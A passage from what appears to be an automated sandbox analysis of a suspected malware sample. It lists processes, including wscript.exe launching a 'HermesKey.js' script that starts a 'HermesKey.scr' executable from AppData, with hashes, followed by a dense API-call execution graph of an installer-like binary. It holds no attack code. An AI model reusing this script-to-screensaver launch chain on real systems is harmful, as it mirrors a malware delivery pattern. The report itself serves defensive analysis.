Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 09:21:56
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 11:19:28
Start date: 18/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"
Imagebase: 0x7ff680350000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 11:19:29
Start date: 18/12/2024
Path: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"
Imagebase: 0x10000
File size: 893'608 bytes
MD5 hash: 18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 8%, ReversingLabs
Has exited: false


                                                      Execution Graph

                                                      Execution Coverage:17.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:20.7%
                                                      Total number of Nodes:1526
                                                      Total number of Limit Nodes:33
4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 
4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 
4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b 
GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 
40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 
4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 
4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 
4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 
4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 
3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 
3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 
403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 
3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 